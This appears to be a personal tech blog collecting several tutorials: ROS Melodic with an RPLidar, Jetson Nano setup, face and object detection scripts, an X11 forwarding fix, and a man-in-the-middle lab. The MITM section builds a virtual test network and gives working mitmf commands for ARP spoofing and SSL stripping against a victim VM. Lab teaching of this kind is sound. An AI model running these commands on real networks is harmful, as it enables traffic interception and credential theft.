RPLidar A1 with ROS Melodic on Ubuntu 18.04

If you are (for example) an owner of NVIDIA Jetson Nano Developer Kit and RPLidar, you can use ROS Melodic to realize obstacle avoidance or simultaneous localization and mapping (SLAM). Here is a beginner’s tutorial for installing the necessary software.

Requirements

Objective

Installing ROS Melodic on Ubuntu 18.04 with Catkin Workspace and use of Python 2.7 for RPLIDAR A1.

Preparation

If you already have the necessary packages installed, you can skip this step.

# update & upgrade
$ sudo apt update && sudo apt upgrade -y

# install needed packages
$ sudo apt install -y git build-essential
Install package

If you run Ubuntu in VirtualBox it is recommended to install the Extension Pack and the VirtualBox Guest Additions.

# install needed packages
$ sudo apt install -y dkms linux-headers-$(uname -r)

# Menu -> Devices -> Insert Guest Additions Image

# reboot system
$ sudo reboot

Install ROS Melodic

For Ubuntu 18.04 you need the latest version ROS 1 (Robot Operating System) Melodic. The packages are not included in the standard sources.

Hint: If you still want to use a newer version of Ubuntu (like 20.04) you need ROS 2 Noetic!

Note: By default the ROS Melodic is using Python 2.7. For higher Python version the following description is not working! But it would also be possible to use Python 3.x, only the steps for installation are little different.

Add ROS repository

The ROS Melodic installation is relatively easy but can take a while depending on the internet connection, as there are many packages to be installed.

# update and install packages
$ sudo apt update && sudo apt install -y ros-melodic-desktop-full python-rosdep python-rosinstall python-rosinstall-generator python-wstool

# verify installation (optional)
$ ls -la /opt/ros/melodic/
add bashrc source
# initialize & update
$ sudo rosdep init && rosdep update

# show ros environment variables (optional)
$ printenv | grep ROS

Create a Catkin workspace

You now need the Catkin Workspace with the necessary RPLIDAR packages/binaries (RPLIDAR SDK from Slamtec).

# create and change into directory
$ mkdir -p $HOME/catkin_ws/src && cd $HOME/catkin_ws/src

# clone Git repository
$ git clone https://github.com/Slamtec/rplidar_ros.git

# change directory
$ cd $HOME/catkin_ws/

# build workspace
$ catkin_make

# verify directory content (optional)
$ ls -la devel/

# refresh environment variables
$ source devel/setup.bash

# verify path variable (optional)
$ echo $ROS_PACKAGE_PATH

# build node
$ catkin_make rplidarNode

Okay, that’s it… Wasn’t very difficult, but a lot of steps.

Start ROS Melodic

Now connect the RPLIDAR device. If you use VirtualBox, pass through the USB from host to guest.

# list USB device and verify permissions
$ ls -la /dev | grep ttyUSB

# change permissions
$ sudo chmod 0666 /dev/ttyUSB0

From now on you need two terminals! Once you have successfully gotartet roscore in the first terminal, switch to the second terminal.

# change directory
$ cd $HOME/catkin_ws/

# launch roscore
$ roscore

Note: Don’t close the first terminal though or don’t stop the running process!

# change directory
$ cd $HOME/catkin_ws

# refresh environment variables
$ source $HOME/catkin_ws/devel/setup.bash

# run UI
$ roslaunch rplidar_ros view_rplidar.launch

Sorry for using screenshots but my provider doesn’t allow the use of certain words or characters. πŸ™

OpenCV & SSD-Mobilenet-v2

The first steps with OpenCV and haarcascades are done and now it should really start. With other models you can detect easily more objects. In this tutorial I will show you therefore a different possibility with your Jetson Nano device. I recommend switching to desktop mode for performance reasons.

Requirements

  • Jetson Nano Developer Kit (2GB / 4GB)
  • 5V Fan installed (NF-A4x20 5V PWM)
  • CSI camera connected (Raspberry Pi Camera Module V2)

Note: You can also use any other compatible fan and camera.

Objective

The goal is to recognize objects as well to mark and label them directly in the live stream from CSI camera. OpenCV and SSD-Mobilenet-v2 with Python3.6 are used for in this tutorial.

Preparation

As always, it takes a few steps to prepare. This is very easy but can take a while.

# update (optional)
$ sudo apt update

# install needed packages
$ sudo apt install cmake libpython3-dev python3-numpy

# clone repository
$ git clone --recursive https://github.com/dusty-nv/jetson-inference.git

# change into cloned directory
$ cd jetson-inference/

# create and change into directory
$ mkdir build && cd build/

# configure build
$ cmake ../

# download only SSD-Mobilenet-v2
# all other you can download later
# PyTorch is also not needed yet

# build with specified job and install
$ make -j$(nproc)
$ sudo make install

# configure dynamic linker run-time bindings
$ sudo ldconfig

CSI Camera Object detection

When the preparation is successfully completed, you can create the first simple Python script.

# create file and edit
$ vim CSICamObjectDetection.py

Here is the content of the script. The important points are commented.

#!/usr/bin/env python3

import jetson.inference
import jetson.utils
import cv2

# set interference
net = jetson.inference.detectNet("ssd-mobilenet-v2", threshold=0.5)


def gstreamer_pipeline(cap_width=1280,
                       cap_height=720,
                       disp_width=800,
                       disp_height=600,
                       framerate=21,
                       flip_method=2):
    return (
        "nvarguscamerasrc ! "
        "video/x-raw(memory:NVMM), "
        "width=(int)%d, height=(int)%d, "
        "format=(string)NV12, framerate=(fraction)%d/1 ! "
        "nvvidconv flip-method=%d ! "
        "video/x-raw, width=(int)%d, height=(int)%d, format=(string)BGRx ! "
        "videoconvert ! "
        "video/x-raw, format=(string)BGR ! appsink" % (cap_width,
                                                       cap_height,
                                                       framerate,
                                                       flip_method,
                                                       disp_width,
                                                       disp_height)
    )


# process csi camera
video_file = cv2.VideoCapture(gstreamer_pipeline(), cv2.CAP_GSTREAMER)

if video_file.isOpened():
    cv2.namedWindow("Detection result", cv2.WINDOW_AUTOSIZE)

    print('CSI stream opened. Press ESC or Ctrl + c to stop application')

    while cv2.getWindowProperty("Detection result", 0) >= 0:
        ret, frame = video_file.read()

        # convert and detect
        imgCuda = jetson.utils.cudaFromNumpy(frame)
        detections = net.Detect(imgCuda)

        # draw rectangle and description
        for d in detections:
            x1, y1, x2, y2 = int(d.Left), int(d.Top), int(d.Right), int(d.Bottom)
            className = net.GetClassDesc(d.ClassID)
            cv2.rectangle(frame, (x1,y1), (x2, y2), (0, 0, 0), 2)
            cv2.putText(frame, className, (x1+5, y1+15), cv2.FONT_HERSHEY_DUPLEX, 0.75, (0, 0, 0), 2)

        # show frame
        cv2.imshow("Detection result", frame)

        # stop via ESC key
        keyCode = cv2.waitKey(30) & 0xFF
        if keyCode == 27 or not ret:
            break

    # close
    video_file.release()
    cv2.destroyAllWindows()
else:
    print('unable to open csi stream')

Now you can run the script. It will take a while the first time, so please be patient.

# execute
$ python3 CSICamObjectDetection.py

# or with executable permissions
$ ./CSICamObjectDetection.py

I was fascinated by the results! I hope you feel the same way.

Invalid MIT-MAGIC-COOKIE-1

Problem

After an OS update including a restart of the system, an error occurs with SSH X11 forwarding. Instead of displaying the windows as usual, “Invalid MIT-MAGIC-COOKIE-1” is displayed in the terminal.

Here is the example. I connect to the Ubuntu with my macOS and get the error message.

β”Œβ”€β”€[lupin@HackMac]::[~]
└─ % ssh -C4Y lupin@10.0.0.12

lupin@nano4gb:~$ xeyes
Invalid MIT-MAGIC-COOKIE-1 keyError: Can't open display: localhost:10.0
lupin@nano4gb:~$ exit

1st Quick and dirty solution

Since I’m on my own and relatively secure network, I leave XQuartz running in the background, disable access control, reconnect and everything works again.

β”Œβ”€β”€[lupin@HackMac]::[~]
└─ % xhost +
access control disabled, clients can connect from any host

β”Œβ”€β”€[lupin@HackMac]::[~]
└─ % ssh -C4Y lupin@10.0.0.12

lupin@nano4gb:~$ xeyes
lupin@nano4gb:~$ exit

This setting is (fortunately) only valid for this one session. As soon as I end the connection, restart XQuartz and establish a new SSH connection, the error message appears again. Anyway a not so nice solution!

2nd Quick and dirty solution

XQuartz offers the possibility to establish the connection without authentication. This solution is permanent and can be set up in the simplest way. Open the XQuartz settings and uncheck the respective checkbox.

XQuartz X11 Settings

Restart XQuartz, establish a new connection.

β”Œβ”€β”€[lupin@HackMac]::[~]
└─ % xhost
access control enabled, only authorized clients can connect

β”Œβ”€β”€[lupin@HackMac]::[~]
└─ % ssh -C4Y lupin@10.0.0.12

lupin@nano4gb:~$ xeyes
lupin@nano4gb:~$ exit
example for xeyes

Now everything works as usual. But even with this solution I have my doubts! So I undo the setting and restart XQuartz.

3rd Quick and dirty solution

As described in the previous step, I undid the setting and restarted XQuartz. Additionally I allowed local connections in the access control.

β”Œβ”€β”€[lupin@HackMac]::[~]
└─ % xhost
access control enabled, only authorized clients can connect

β”Œβ”€β”€[lupin@HackMac]::[~]
└─ % xhost +local:
non-network local connections being added to access control list

β”Œβ”€β”€[lupin@HackMac]::[~]
└─ % ssh -C4Y lupin@10.0.0.12

lupin@nano4gb:~$ xeyes
lupin@nano4gb:~$ exit

This solution also works but is not permanent and not secure.

What now?

Searching the internet didn’t really help me. Some of the suggested solutions are total nonsense (or I completely misunderstand). I’ve also read the man pages where it even says that the environment variable $DISPLAY should not be changed. With me (also due to the ignorance on my part) the first signs of despair are appearing! Trust me, I deleted also all recommended files, what did not change this situation.

My final Solution

In the end my problem was very easy to solve! I still had entries from already deleted macports in the .zprofile file, which set the local environment variable $DISPLAY. With the restart of my macOS, this export of the environment variable became active again, of course.

β”Œβ”€β”€[lupin@HackMac]::[~]
└─ % echo $DISPLAY
:0

β”Œβ”€β”€[lupin@HackMac]::[~]
└─ % vim .zprofile

# I deleted all old macports entries

β”Œβ”€β”€[lupin@HackMac]::[~]
└─ % sudo reboot

The result after the restart.

β”Œβ”€β”€[lupin@HackMac]::[~]
└─ % echo $DISPLAY           
/private/tmp/com.apple.launchd.ASpxDkLA98/org.xquartz:0

β”Œβ”€β”€[lupin@HackMac]::[~]
└─ % ssh -C4Y lupin@10.0.0.12

lupin@nano4gb:~$ xeyes

Everything is all right again. Oh yeah… that was troubleshooting. The good thing is I learned a lot about xhost, xauth plus my own systems.

First steps with Jetson Nano 2GB Developer Kit (Part 3)

In the two previous steps you installed the Jetson nano operating system and installed the necessary hardware pereferie. In this part you will learn how to recognize faces in pictures. In addition, it is shown how to use this remote via SSH/X11 Forward (headless).

Note: If you like to use the GUI, you can jump directly to section “Python & OpenCV” and adapt necessary steps.

Preparation

Since I use macOS myself, this tutorial will also be based on this. If you are a user of another operating system, search the Internet for the relevant solution for the “Preparation” section. However, the other sections are independent of the operating system.

If you haven’t done it, install XQuartz on your macOS now. To do this, download the latest version (as DMG) from the official site and run the installation. Of course, if you prefer to use a package manager like Homebrew, that’s also possible! If you do not have to log in again automatically after the installation, carry out this step yourself! That’s pretty much it. It shouldn’t need anything other than starting XQuarts.

Now start the SSH connection to the Jetson Nano (while XQuarts is running in the background).

# connect via SSH
$ ssh -C4Y <user>@<nano ip>

X11 Forwarding

You might want to check your SSH configuration for X11 on the Jetson Nano first.

# verify current SSH configuration
$ sshd -T | grep -i 'x11\|forward'

Important are following setings x11forwarding yes, x11uselocalhost yes and allowtcpforwarding yes. If these values ​​are not set, you must configure them and restart the SSHD service. Normally, however, these are already preconfigured on latest Jetson Nano OS versions.

# edit configuration
$ sudo vim / etc /ssh/sshd_config

# restart service after changes
$ sudo systemctl restart sshd

# check sshd status (optional)
$ sudo systemctl status sshd

Note: The spaces between slashes and etc is wrong! But my provider does not allow the correct information for security reasons.

You may have noticed that you established the SSH connection with “-Y”. You can check that with the environment variable $DISPLAY.

# show value of $DISPLAY (optional)
$ echo $DISPLAY
localhost:10.0

Attention: If the output is empty, check all previous steps carefully again!

Python & OpenCV

Normally Python3.x and OpenCV already exist. If you also want to check this first, proceed as follows.

# verify python OpenCV version (optional)
$ python3
>>> import cv2
>>> cv2.__version__
>>> exit()

Then it finally starts. Now we develop the Python script and test with pictures whether we recognize the faces of people. If you don’t have any pictures of people yet, check this page. The easiest way is to downnload the images into the HOME directory. But you can also create your own pictures with the USB or CSI camera.

# change into home directory
$ cd ~

# create python script file
$ touch face_detection.py

# start file edit
$ vim face_detection.py

Here the content of the Python Script.

#!/usr/bin/env python3

import argparse
from pathlib import Path
import sys
import cv2

# define argparse description/epilog
description = 'Image Face detection'
epilog = 'The author assumes no liability for any damage caused by use.'

# create argparse Object
parser = argparse.ArgumentParser(prog='./face_detection.py', description=description, epilog=epilog)

# set mandatory arguments
parser.add_argument('image', help="Image path", type=str)

# read arguments by user
args = parser.parse_args()

# set all variables
IMG_SRC = args.image
FRONTAL_FACE_XML_SRC = '/usr/share/opencv4/haarcascades/haarcascade_frontalface_default.xml'

# verify files existing
image = Path(IMG_SRC)
if not image.is_file():
    sys.exit('image not found')

haarcascade = Path(FRONTAL_FACE_XML_SRC)
if not haarcascade.is_file():
    sys.exit('haarcascade not found')

# process image
face_cascade = cv2.CascadeClassifier(FRONTAL_FACE_XML_SRC)
img = cv2.imread(cv2.samples.findFile(IMG_SRC))
gray_scale = cv2.cvtColor(img, cv2.COLOR_BGR2GRAY)
detect_face = face_cascade.detectMultiScale(gray_scale, 1.3, 5)

for (x_pos, y_pos, width, height) in detect_face:
    cv2.rectangle(img, (x_pos, y_pos), (x_pos + width, y_pos + height), (10, 10, 255), 2)

# show result
cv2.imshow("Detection result", img)

# close
cv2.waitKey(0)
cv2.destroyAllWindows()

Hint: You may have noticed that we use existing XML files in the script. Have a look under the path, there are more resources.

# list all haarcascade XML files
$ ls -lh /usr/share/opencv4/haarcascades/

When everything is done, start the script include specifying the image arguments.

# run script
$ python3 face_detection.py <image>

# or with executable permissions
$ ./face_detection.py <image>

You should now see the respective results. With this we end the 3rd part. Customize or extend the script as you wish.

First steps with Jetson Nano 2GB Developer Kit (Part 2)

In the first part I explained the initial setup of the Jetson Nano 2GB Developer Kit. This second part should help with additional (but required) hardware like the fan and csi camera.

Preparation

If you are still connected via SSH (or serial) and the Jetson Nano is still running, you have to shut it down now.

# shutdown
$ sudo shutdown -h 0

Connect the fan and the camera and make sure that all connections are made correctly! If you are not sure, look for the respective video on this very helpful website. As soon as you are done, you can restart the Jetson Nano and connect.

Note: The screws that come with the fan are too big. So I simply used cable ties. Otherwise I can really recommend this fan.

Fan

As soon as you have started and logged in again, you should check whether the fan is basically running.

# turn on fan
$ sudo sh -c 'echo 255 > /sys/devices/pwm-fan/target_pwm'

# turn off fan
$ sudo sh -c 'echo 0 > /sys/devices/pwm-fan/target_pwm'

If that worked, the easiest way use the code provided on GitHub to start/stop the fan on certain temperatures fully automatically.

# clone repository
$ git clone https://github.com/Pyrestone/jetson-fan-ctl.git

# change into cloned repository
$ cd jetson-fan-ctl

# start installation
$ sudo ./install.sh

# check service (optional)
$ sudo systemctl status automagic-fan

You can also change the values for your own needs.

# edit via vim
$ sudo vim / etc/automagic-fan/config.json

# restart service after changes
$ sudo systemctl restart automagic-fan

Note: The space between slash and etc is wrong! But my provider does not allow the correct information for security reasons.

From now on, your Jetson Nano should be protected against too quickly overheating. If you want to determine the current values ​​yourself, simply call up the following commands.

# show thermal zones
$ cat /sys/devices/virtual/thermal/thermal_zone*/type
$ cat /sys/devices/virtual/thermal/thermal_zone*/temp

Camera

The CSI camera don’t need any additional installation of packages, all you need is already installed. So after booting up, you can start right away.

Important: Do not attach the CSI camera while the device is running!

# list video devices
$ ls -l /dev/video0
crw-rw----+ 1 root video 81, 0 Jan  9 12:07 /dev/video0

An additional package allows you to find out the possibilities of the camera.

# install package (optional)
$ sudo apt install -y v4l-utils

# list information (optional)
$ v4l2-ctl --list-formats-ext

Take a picture

# take picture and save to disk
$ nvgstcapture-1.0 --orientation=2 --image-res=2

# Press j and ENTER to take a picture
# Press q and ENTER to exit

# list stored pictures
$ ls -lh nvcamtest_*
-rw-rw-r-- 1 lupin lupin 20K Jan  9 15:39 nvcamtest_7669_s00_00000.jpg

Now record a video. Be careful with your disk space!

# take video and save to disk
$ nvgstcapture-1.0 --orientation 2 --mode=2

# Press 1 and ENTER to start record
# Press 0 and ENTER to stop record
# Press q and ENTER to exit

$ ls -lh *.mp4
-rw-rw-r-- 1 lupin lupin 3,0M Jan  9 15:52 nvcamtest_8165_s00_00000.mp4

That’s it for this time.

First steps with Jetson Nano 2GB Developer Kit (Part 1)

The Jetson Nano Developer Kits are awesome to start with artificial intelligence and machine learning. To make your learning more successful, I will use this tutorial to explain some first important steps before you start.

Requirements

The values ​​in brackets are intended to indicate the hardware I am using. However, you can use other compatible hardware. Before you buy, see the documentation provided by Nvidia. Here you will find also a page with many good information collected.

  • Jetson Nano Developer Kit (2GB with WiFi)
  • 5V Fan (NF-A4x20 5V PWM)
  • USB or CSI camera (Raspberry Pi Camera Module V2)
  • Power Supply (Raspberry Pi 15W USB-C Power Supply)
  • Micro SD Card (SanDisk microSDXC-Karte Ultra UHS-I A1 64 GB)

additional Hardware:

  • Monitor & HDMI cable
  • Mouse & Keyboard
  • USB cable (Delock USB 2.0-Kabel USB C – Micro-USB B 1 m)

Objective

The first part should provide information about needed parts to buy and describes the necessary installation (headless).

Installation

After downloading the SD card image (Linux4Tegra, based on Ubuntu 18.04), you can write it to the SD card immediately. Make sure to use the correct image in each case! Here a short overview about commands if you use a macOS.

# list all attached disk devices
$ diskutil list external | fgrep '/dev/disk'

# partitioning a disk device (incl. delete)
$ sudo diskutil partitionDisk /dev/disk<n> 1 GPT "Free Space" "%noformat%" 100%

# extract archive and write to disk device
$ /usr/bin/unzip -p ~/Downloads/jetson-nano-2gb-jp46-sd-card-image.zip | sudo /bin/dd of=/dev/rdisk<n> bs=1m

There is no automatic indication of the dd progress but you can press [control] + [t] while dd is running.

The setup and boot of the Jetson Nano could be done in two different ways (with GUI or Headless). In case you choose the headless setup, connect your computer with the Micro-USB port of the Jetson Nano and follow the next instructions.

# list serial devices (optional)
$ ls /dev/cu.usbmodem*

# list serial devices (long listing format)
$ ls -l /dev/cu.usbmodem*
crw-rw-rw-  1 root  wheel   18,  24 Dec  2 07:23 /dev/cu.usbmodem<n>

# connect with terminal emulation
$ sudo screen /dev/cu.usbmodem<n> 115200

Now you simply follow the initial setup steps and reboot the device after your finish.

Connect to WiFi

If you have not setup the WiFi on initial setup, you can connect again via serial interface and follow the next steps.

# connect with terminal emulation
$ sudo screen /dev/cu.usbmodem<n> 115200

# enable (if WiFi is disabled)
$ nmcli r wifi on

# list available WiFi's
$ nmcli d wifi list

# connect to WiFi
$ nmcli d wifi connect <SSID> password <password>

# show status (optional)
$ nmcli dev status

# show connections (optional)
$ nmcli connection show

Finally you can run the update and installation of needed additional packages.

# update packages
$ sudo apt update -y && sudo apt upgrade -y

# install packages (optional)
$ sudo apt install -y vim tree

From this point on, nothing should stand in the way of the SSH connection, provided you are in the same network.

# get IP (on Jetson device)
$ ip -4 a

# connect via SSH (example for local device)
β”Œβ”€β”€[lupin@HackMac]::[~]
└─ % ssh -C4 <user>@<ip>

In next Part 2 we will add the fan (incl. installation of needed software) and add the camera.

Man in the Middle Attack (MITM)

In this tutorial you will learn how to work a man in the middle attack. For this you will create and configure a simple test environment. The test environment simulates a small home network with a NAT router, a client (victim) and another client (evil) that has already penetrated the network. For the attack itself, you will get in touch with popular mitmf framework.

Attention: The tutorial is presented just for educational purposes. If you do what you have learned outside the test environment, you may be liable to prosecution.

Requirements

  • VirtualBox (5.2.18)
  • Vagrant (2.1.5)

Prepare environment

In the first step, you need to configure, setup and provision the environment. Vagrant will help you here. Via Vagrant you will create all needed virtual machines (incl. SSH keys) and install the needed packages on the evil engine. Via file machines.yml you could add Vagrant boxes for Windows, macOS as well.

# create project
$ mkdir -p ~/Projects/ExampleEnv && cd ~/Projects/ExampleEnv

# create needed files
$ touch Vagrantfile machines.yml

# edit machines.yml (copy content into file)
$ vim machines.yml

# edit Vagrantfile (copy content into file)
$ vim Vagrantfile

# run Vagrant
$ vagrant up
---
  - name: evil
    box: debian/stretch64
    cpus: 1
    memory: 1024
  - name: victim
    box: chad-thompson/ubuntu-trusty64-gui
    cpus: 1
    memory: 1024

Note:Β Please remove the spaces behind etc (in the Vagrantfile)! These are only because of the security settings of my provider.

# -*- mode: ruby -*-
# vi: set ft=ruby :

require 'yaml'
machines = YAML.load_file('machines.yml')

Vagrant.configure("2") do |config|
  machines.each do |machines|
    config.vm.define machines["name"] do |machine|

      # define vagrant box
      machine.vm.box = machines["box"]
      # disbale default synced_folder
      machine.vm.synced_folder ".", "/vagrant", disabled: true
      # configure virtualbox
      machine.vm.provider :virtualbox do |vb|
        vb.name = machines["name"]
        vb.cpus = machines["cpus"]
        vb.memory = machines["memory"]
        vb.gui = false
      end
      # provisioning: only evil
      if machines["name"] == 'evil'
        machine.vm.provision "shell", inline: <<-SHELL
          echo 'deb http://http.kali.org/kali kali-rolling main non-free contrib' >> /etc /apt/sources.list
          echo 'deb-src http://http.kali.org/kali kali-rolling main non-free contrib' >> /etc /apt/sources.list
          apt-get update
          apt-get install -y --allow-unauthenticated mitmf
        SHELL
      end

    end
  end
end

Small network changes

You must now switch from typical NAT to NAT network. For that you stop (halt) all VM’s. In the next steps you will create a new NAT network and configure the VM network adapters for this network. In the end, you simulated a simple home network.

# stop all VM's
$ vagrant halt

# create new VirtualBox NAT-Network
$ VBoxManage natnetwork add --netname homenet --network "192.168.15.0/24" --enable --dhcp on --ipv6 off

# list all NAT-Networks (optional)
$ VBoxManage list natnetworks

# change interfaces from NAT to NAT-Network for evil VM
$ VBoxManage modifyvm evil --nic1 natnetwork --nat-network1 homenet

# change mac address for evil VM
$ VBoxManage modifyvm evil --macaddress1 08002707B96E

# show network configuration for evil (optional)
$ VBoxManage showvminfo evil | grep "NIC"

# change interfaces from NAT to NAT-Network for victim VM
$ VBoxManage modifyvm victim --nic1 natnetwork --nat-network1 homenet

# change mac address for victim VM
$ VBoxManage modifyvm victim --macaddress1 080027C0B653

# some Ubuntu VirtualBox changes
$ VBoxManage modifyvm victim --accelerate3d on --vram 128

# show network configuration for victim (optional)
$ VBoxManage showvminfo victim | grep "NIC"

Start all VM’s again

In this step we start all VM’s but without Vagrant.

# start evil VM
$ VBoxManage startvm evil

# start victim VM
$ VBoxManage startvm victim

Now check the network interfaces for both VM’s. Please note down the IP’s, you will need them in next steps. You can login in both with credentials vagrant:vagrant.

# evil VM
$ ip -4 addr
...
inet 192.168.15.5

# victim VM
$ ip -4 addr
...
192.168.15.6

Note: In the example the evil VM has the IP: 192.168.15.5 and the victim the IP: 192.168.15.6 – this could be different for you.

In order not to use the VirtualBox Terminal, create a port forward from the localhost to the evil VM.

# add port forwarding from localhost to evil VM
$ VBoxManage natnetwork modify --netname homenet --port-forward-4 "evilssh:tcp:[]:2222:[192.168.15.5]:22"

# ssh connection to evil
$ ssh -i .vagrant/machines/evil/virtualbox/private_key -p 2222 -o StrictHostKeyChecking=no -o UserKnownHostsFile=/dev/null vagrant@localhost

Man-in-the-middle attack

You made it, the test environment is finally ready. If you have been able to learn something new up to this point, I am glad. Now imagine the following situation. You are the victim and you surf the Internet, logging in on your popular websites. Can you imagine what can happen? In a few minutes you will see it.

Once the Ubuntu has booted, run the following command (as evil) and surf the web using the Firefox browser (as victim). If the mitmf returns an error message, repeat the command in the terminal. Be a bit patient on successful call.

# change to root
$ sudo su -

# enable ip4_forward (only this session)
$ sysctl -w net.ipv4.ip_forward=1

# check ip4_forwarding is enabled (optional)
$ sysctl net.ipv4.ip_forward

# start mitmf (incl. ARP spoofing)
$ mitmf --spoof --arp -i eth0 --gateway 192.168.15.1 --target 192.168.15.6

# start mitmf (incl. ARP spoofing, enabled SSLstrip, Session kill)
$ mitmf --spoof --arp --hsts -k -i eth0 --gateway 192.168.15.1 --target 192.168.15.6

Mitmf still offers a lot of plug-ins, just give it a try.

Build notifications with CatLight

CatLight is the the perfect app if you would like to know the current status of your continuous delivery pipelines, tasks and bugs. Without looking on E-Mails or visit build servers you know when attention is needed. It’s available for Debian, Ubuntu, Windows and MacOS.

CatLight works with Jenkins, TFS, Travis CI and many more.

catlight setup

After successful installation and configuration, CatLight offers a lot of cool features.

catlight jobs

For personal usage it’s free, you only have to register.